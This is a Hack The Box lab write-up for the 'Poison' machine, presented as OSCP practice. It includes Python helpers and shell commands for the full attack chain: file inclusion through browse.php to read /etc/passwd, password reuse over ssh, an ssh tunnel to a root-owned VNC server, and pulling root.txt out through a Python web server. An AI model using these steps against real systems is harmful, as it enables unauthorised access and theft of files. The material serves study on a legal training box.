Hack The Box is an online platform for testing and advancing your skills in penetration testing and cyber security.
In this series of articles we show how junior evaluators complete some Hack The Box machines on their road to the OSCP, a well-known and respected certification that many top cybersecurity positions require. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems that suffer from poor configurations.
Let's start with the fun!
Poison
Initial Foothold
Looking at the webpage on port 80 and playing with the different options, we run listfile.php and see that there is a text file called pwdbackup.txt with the following contents:
This password is secure, it's encoded atleast 13 times.. what could go wrong really..
followed by a long base64 blob. Decoding it from base64 over and over (the note says at least 13 times) until the output stops being base64 gives the password: Charix!2#4%6&8(0
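The "decode base64 a million times" step, as an added example rather than code from the original write-up. The real blob from pwdbackup.txt is not reproduced here, so the script builds an equivalent one by wrapping the known password in 13 layers of line-wrapped base64 (a constructed sample), then peels the layers off until the text is no longer base64. It also handles the case the naive loop gets wrong: a plaintext that happens to be valid base64 (an 8-character alphanumeric password, say) decodes to binary junk, so the loop stops when the decoded bytes are not printable and returns the previous layer.

```python
import base64
import binascii

# Constructed sample: the blob in pwdbackup.txt is not reproduced here, so we
# rebuild an equivalent one by base64-encoding the known password 13 times,
# line-wrapped at 76 columns the way the base64 tool (and the real file) do it.
KNOWN_PASSWORD = "Charix!2#4%6&8(0"

# Everything base64.b64decode accepts once whitespace is stripped.
BASE64_ALPHABET = set(
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
)


def wrap_base64(secret: str, rounds: int) -> str:
    """Nest `secret` inside `rounds` layers of line-wrapped base64."""
    data = secret.encode()
    for _ in range(rounds):
        data = base64.encodebytes(data)  # wraps at 76 chars with '\n'
    return data.decode()


def looks_printable(data: bytes) -> bool:
    """True if every byte is printable ASCII or ordinary whitespace."""
    return all(32 <= b < 127 or b in b"\r\n\t" for b in data)


def peel_base64(blob: str, max_rounds: int = 64) -> tuple[str, int]:
    """Decode base64 repeatedly until the result is no longer base64.

    Stops when the current text contains characters outside the base64
    alphabet, fails strict decoding (bad length or padding), or decodes
    to non-printable bytes; the last guard catches plaintexts that happen
    to be valid base64. Returns the final text and the number of layers
    removed.
    """
    data = blob.encode()
    rounds = 0
    while rounds < max_rounds:
        stripped = b"".join(data.split())  # drop the line wrapping
        if not stripped or not BASE64_ALPHABET.issuperset(stripped):
            break
        try:
            decoded = base64.b64decode(stripped, validate=True)
        except binascii.Error:  # wrong length, bad padding, stray '='
            break
        if not decoded or not looks_printable(decoded):
            break  # one layer too far: the current text is the answer
        data = decoded
        rounds += 1
    return data.decode(), rounds


SAMPLE_BLOB = wrap_base64(KNOWN_PASSWORD, 13)

if __name__ == "__main__":
    password, layers = peel_base64(SAMPLE_BLOB)
    print(f"{layers} layers removed, password: {password}")
```

The stop condition is the part worth thinking about: checking "is this still valid base64" alone is not enough, because short alphanumeric strings such as Password are valid base64 too and would be mangled by one decode too many.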
We also see that when running a script from the main page, the script name is passed as a parameter to browse.php: http://10.10.10.84/browse.php?file=ini.php
Can we read different files? http://10.10.10.84/browse.php?file=/etc/passwd
We can. An absolute path is accepted as-is, so browse.php hands back any file the web server's user can open, with no restriction to the web root. In /etc/passwd we find a user called charix.
So we can ssh in as charix with the password Charix!2#4%6&8(0 (the one recovered from pwdbackup.txt).
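Turning the /etc/passwd read into a list of accounts worth trying the password against, as an added example that is not part of the original write-up. The URL builder uses the browse.php endpoint and parameter from the page; fetch_file needs network access to the box and is only called by hand, while the parser runs offline on a constructed FreeBSD-style /etc/passwd sample (the box's real file is not reproduced). The parser is the general version of the "find a user" step: it drops service accounts with nologin-style shells and keeps the ones that can actually log in, including FreeBSD's toor, whose empty shell field means the default /bin/sh rather than "no shell".

```python
from urllib.parse import quote
from urllib.request import urlopen

# Endpoint and parameter taken from the write-up.
BASE_URL = "http://10.10.10.84/browse.php"

# Shells that do not give an interactive login; accounts using them are
# service accounts, not candidates for password reuse over ssh.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false",
                  "/usr/bin/false", "/bin/sync"}


def lfi_url(path: str, base: str = BASE_URL) -> str:
    """Build the browse.php?file=... URL for an absolute or relative path."""
    return f"{base}?file={quote(path, safe='/')}"


def fetch_file(path: str, base: str = BASE_URL, timeout: float = 5.0) -> str:
    """Pull a file through the unrestricted `file` parameter (needs network)."""
    with urlopen(lfi_url(path, base), timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def interactive_users(passwd_text: str) -> list[dict]:
    """Parse /etc/passwd text and keep accounts that can actually log in."""
    users = []
    for line in passwd_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:  # malformed or truncated line
            continue
        name, _pw, uid, _gid, _gecos, home, shell = fields
        # On FreeBSD an empty shell field means the default shell (/bin/sh),
        # so only an explicit nologin-style shell disqualifies the account.
        if shell in NOLOGIN_SHELLS:
            continue
        users.append({"name": name, "uid": int(uid), "home": home,
                      "shell": shell or "/bin/sh"})
    return users


# Constructed sample in FreeBSD /etc/passwd format; not the box's real file.
SAMPLE_PASSWD = """\
# constructed sample
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
"""

if __name__ == "__main__":
    # Offline run on the constructed sample; against the box you would call
    # interactive_users(fetch_file("/etc/passwd")) instead.
    for user in interactive_users(SAMPLE_PASSWD):
        print(f"{user['name']:8} uid={user['uid']:<6} shell={user['shell']}")
```

Only the `*` password field shows up in /etc/passwd; the hashes live in /etc/master.passwd on FreeBSD, which the web server's user normally cannot read, so the parser deliberately ignores that field.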
Root
In the user's home there is a file called secret.zip; if we try to extract it, it asks for a password. Reusing the password from the ssh connection unzips it, yielding a file called secret that looks like gibberish.
After some manual enumeration (manual because this is FreeBSD, not Linux, so the usual Linux privilege-escalation scripts are of little help), we stumble upon a peculiar process in the output of ps aux:
root 529 0.0 0.9 23620 8868 v0- I 17:58 0:00.02 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -lo
This is a VNC server (Xvnc) running as root on port 5901, which we can confirm with sockstat -l. Note the -rfbauth /root/.vnc/passwd argument: clients are authenticated against a VNC password file in root's home, and since the server itself runs as root, whoever knows that password gets root's desktop.
The easiest way to reach this service from our machine is to tunnel it over the ssh session we already have (pro-tip: use the ssh escape sequence, the konami code of ssh):
In the ssh session press ENTER, type ~C to open the ssh command line, and then add a local forward with -L 6969:localhost:5901. The tilde is only recognised as the first character of a line, which is why you press ENTER first. On OpenSSH 9.2 and later the ~C command line is disabled by default; either enable it with -o EnableEscapeCommandline=yes or simply reconnect with ssh -L 6969:localhost:5901 charix@10.10.10.84.
Now we can use a VNC client like vncviewer to connect to it:
vncviewer localhost:6969
It asks for a password. We have a candidate, the file we extracted from secret.zip, but it does not even look like printable text, so we cannot type it. Maybe we can pass the password as a file. Looking through vncviewer -h we find the option -p, which takes a VNC password file (other vncviewer builds call it -passwd).
That also explains the gibberish: a VNC password file is the (at most 8-character) password encrypted with a fixed DES key that every VNC implementation shares, so it is obfuscation rather than protection, and anyone who can read the file effectively has the password.
So, with the following command: vncviewer -p secret localhost:6969
we connect to the VNC server, which displays a terminal with a root shell in it.
Bonus Footage
Since I could not manage to copy and paste root.txt out of the VNC session, I started python -m SimpleHTTPServer 6969 in the root shell and downloaded the file from my machine with wget 10.10.10.84:6969/root.txt. (With Python 3 the equivalent is python3 -m http.server 6969.) Keep in mind that this serves the current directory to anyone who can reach the box, so run it from a directory that holds only what you need and kill it as soon as the download is done.